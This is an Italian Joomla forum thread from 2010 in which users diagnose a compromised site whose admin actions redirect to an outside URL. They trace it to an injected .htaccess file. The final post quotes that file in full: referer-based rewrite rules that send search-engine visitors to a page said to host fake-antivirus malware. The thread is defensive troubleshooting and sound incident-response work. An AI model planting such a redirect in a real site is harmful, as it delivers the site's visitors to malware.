Joomla.it Forum

Non solo Joomla... => Sicurezza => Topic aperto da: anna15 - 10 Mag 2010, 11:13:41

Titolo: [RISOLTO] sito violato?
Inserito da: anna15 - 10 Mag 2010, 11:13:41
Ciao a tutti
sto lavorando sul sito www.ain.piemonte.it ma dall'amministrazione non mi fa fare piu' niente , per esempio se cerco di salvare un articolo mi rimanda a http://belpunto.it/media/img.php
cosa devo fare? Grazie mille!!!
Titolo: Re:sito violato?
Inserito da: mmleoni - 10 Mag 2010, 11:43:32
ciao anna15,
 non mi sembra esattamente il comportamento di un hack, soprattutto visto che entri, secondariamente dato il sito di destinazione.

hai provato a modificare un altro articolo o a caricare un'immagine?

avete installato qualcosa dall'ultima volta che lo hai usato?

ciao,
marco
Titolo: Re:sito violato?
Inserito da: anna15 - 10 Mag 2010, 11:54:19
adesso ho inserito un articolo di prova nella rassegna stampa e lo ha inserito...
poi ho provato a modificarlo e facendo salva mi manda a questo link  http://belpunto.it/media/img.php
e nella pagina viene scritto "No input file specified. "
 :-\
Titolo: Re:sito violato?
Inserito da: anna15 - 10 Mag 2010, 11:56:40
non so se puo' essere utile ma la versione di joomla e' la "Versione 1.5.7"
Titolo: Re:sito violato?
Inserito da: mmleoni - 10 Mag 2010, 12:05:04
magari sarebbe il caso di aggiornare, dato che siamo alla 1.5.17  >:(

avete sostituito l'editor di default? avete aggiunto qualche plugins?  non mi quadra proprio come hacking.

ciao,
marco
Titolo: Re:sito violato?
Inserito da: OCines - 10 Mag 2010, 12:22:04
ciao a tutti,
ho riscontrato lo stesso ed identico problema di anna15,
tutte le azioni fatte dal menu di amministrazione fanno un redirect automatico a http://belpunto.it/media/img.php
(che fino a 2 giorni fa andava in cascata su altri 3 siti).

Quando ho riscontrato il problema avevo istallato la versione 1.5.15, era da un può di tempo che non toccavo la configurazione (editor, plugin...);
ho controllato tutti i file per cercarne qualcuno modificato di recente, ma niente;
ho verificato il DB per cercare qualche iniection sql, ma anche qui niente;
ho aggiornato Joomla alla versione 1.5.17 ma il problema continua a sussistere.

Avete qualche suggerimento?

grazie
Titolo: Re:sito violato?
Inserito da: vamba - 10 Mag 2010, 12:30:35
A questo punto sarebbe utile capire quali sono le estensioni aggiunte oltre a quelle di default, per vedere se ci sono analogie.
quel tipo di link mi fa pensare ad un estensione per la creazione on fly di miniature, quindi fateci sapere le vostre configurazioni.
Titolo: Re:sito violato?
Inserito da: OCines - 10 Mag 2010, 12:44:55
attachment 1.3.4
DOCman 1.4.0 RC3
DOCLink 1.5 rc1
EventList 1.0
QuickFAQ 1.0.3
XMap 1.2
SuperFishMenu
Titolo: Re:sito violato?
Inserito da: anna15 - 10 Mag 2010, 12:45:33
ho installato
mod_aqsg_newsflash
chrono forms
fireboard forum
Titolo: Re:sito violato?
Inserito da: anna15 - 10 Mag 2010, 14:24:33
Ciao
Ho modificato la pass sul file configuration.php e ho caricato il file sul server e quando cerco di riconnettermi vuole comunque la pass vecchia... :o
curioso!!!
Titolo: Re:sito violato?
Inserito da: mmleoni - 10 Mag 2010, 14:35:34
curioso che funzioni: la pw in configuration è quella di connessione al db, non di accesso all'amministrazione, che è invece conservata nel db. (mi sa che l'upload non ha funzionato o per fortuna hai modificato la pw dello ftp e/o smtp)

per tutti e due:
verificate che tra i plugins di tipo editors ed editors-xtd non vi sia qualcosa non relativo a joomla; "TinyMCE 3" è giusto che  ci sia.

ciao,
marco
Titolo: Re:sito violato?
Inserito da: anna15 - 10 Mag 2010, 14:48:41
hai ragione la pass è nel database...ricordavo male era quella ftp...
:-[  dove devo guardare dall'amministrazione o dalle cartelle con l'ftp?
Titolo: Re:sito violato?
Inserito da: mmleoni - 10 Mag 2010, 14:54:15
nell'amministrazione -> Estensioni -> Installa/Disinstalla -> plugin, poi usa il filtro per visualizzare solo i due gruppi indicati

da qui vedi anche l'autore ed è più semplice.

ciao
Titolo: Re:sito violato?
Inserito da: anna15 - 10 Mag 2010, 14:59:25
come editors-xtd ho solo
Button - Image,
Button - Readmore,
Button - Pagebreak
e come editor
1 Editor - None  editors  1.0     August 2004              
2 Editor - TinyMCE 2.1    editors 2.1.2    2005    Moxiecode Systems AB    
3 Editor - XStandard Lite for Joomla! editors    1.0    Aug 2007 Joomla! Project
Titolo: Re:sito violato?
Inserito da: mmleoni - 10 Mag 2010, 17:32:24
questi sono giusti, comunque continuo a pensare che non si tratti di un hack, viste le modalità.

 :-\ fatemi pensare...

Titolo: Re:sito violato?
Inserito da: anna15 - 10 Mag 2010, 23:51:55
Un mio amico mi ha consigliato di contattare il sito su cui puntavano i link e questa e' stata la risposta....
------------------------
Gentile Sig.ra....,
qualche giorno fa ci erano stati segnalati problemi derivanti dal ns. sito, provenienti dal link che ci ha segnalato. Abbiamo provveduto ad avvisare sia la società che ha fatto il ns. sito, sia i proprietari del  server in cui è ospitato (......) Ci hanno riferito che la pagina in questione, pur avendo l'indirizzo del ns. sito, non apparteneva ad esso ma era ospitata nello stesso server, e  conteneva una pagina "malware" (una finta scansione antivirus) che è  stata rimossa.
Cordiali saluti.
--------------------------
questo significa che piu' siti manomessi interagivano tra di loro?
devo reinstallare il mio sito utilizzando l'ultimo backup sicuro?  :'(
avete consigli oltre a quello di cambiare pass e aggiornare joomla piu' frequentemente?
grazie molte per l'aiuto
Anna
Titolo: Re:sito violato?
Inserito da: mmleoni - 11 Mag 2010, 07:46:52
vi proporrei un test: provate ad usare il sito da un altro computer, o a farlo provare da una terza persona il cui computer non abbia di sicuro installato il malware in questione.

Citazione
ho aggiornato Joomla alla versione 1.5.17 ma il problema continua a sussistere
questa  frase mi fa pensare che il problema potrebbe essere sul pc...

ciao,
marco
Titolo: Re:sito violato?
Inserito da: anna15 - 11 Mag 2010, 11:01:11
Ciao , lo fa da qualsiasi computer e da luoghi diversi :-\
ma se fosse locale il problema dovrei averlo anche sull'amministrazione di altri siti joomla?
lo fa solo su quello in oggetto..
ciao Anna
Titolo: Re:sito violato?
Inserito da: OCines - 11 Mag 2010, 11:37:26
scusate il ritardo!

gli editor che sono istallati sono quelli standard

editors:
Editor - None 1.0 August 2004
Editor - TinyMCE 3 3.2.6 2005-2009 Moxiecode Systems AB
Editor - XStandard Lite for Joomla! 1.0   Aug 2007 Joomla! Project

editors-xtd:
DOCLink 1.5.0rc1 September 2007 DOCman Development Team
Editor Button - AddAttachment 1.3.4 August 17, 2008 Jonathan M. Cameron
Button - Image 1.0.0 August 2004 Joomla! Project
Button - Pagebreak 1.5 August 2004 Joomla! Project    
Button - Readmore 1.5 March 2006 Joomla! Project

ho verificato l'accesso all'amministrazione da PC diversi ma della stessa LAN e il problema si presenta ovunque e con browser diversi (IE e Firefox)

Ho notato una cosa particolare:
in gestione articoli se clicco su un nome di articolo per modificarlo, a volte, nella schermata dell'editor non compare la parte di intestazione con i pulsanti per la modifica del testo e viene visualizzato il codice HTML con tutti i relativi tag, se invece seleziono l'articolo e clicco sul bottone modifica ciò non accade.

Altra nota:
Il redirect non voluto si ha quando clicco sui tasti "salva" "applica" e "chiudi" della pagina di modifica/creazione articolo, potrebbe dipendere da qualche .js che gestisce i bottoni?
Titolo: [RISOLTO] sito violato?
Inserito da: anna15 - 11 Mag 2010, 20:45:09
finalmente abbiamo risolto :)....evidentemente sono riusciti ad entrare con l'ftp credo ehanno inserito un file .htaccess con dentro un po di cose ....
ho cambiato tutte le pass e spero non abbiano fatto altro danno...
ho anche mandato comunicazione al provider perche' controlli anche lui .
OCines controlla di non avere un file con questo nome nella root principale e cancellalo....

devo controllare qual'cosaltro secondo voi???
grazie per il supporto
Anna
Titolo: Re:sito violato?
Inserito da: anna15 - 11 Mag 2010, 22:59:28
ecco per inciso cosa ho trovato nel file .htaccess, l'ho rinominato per poi cancellarlo  :o
--------------------------------
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*gooo?gle.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule .* http://belpunto.it/media/img.php [R,L]
------------------------------------------------------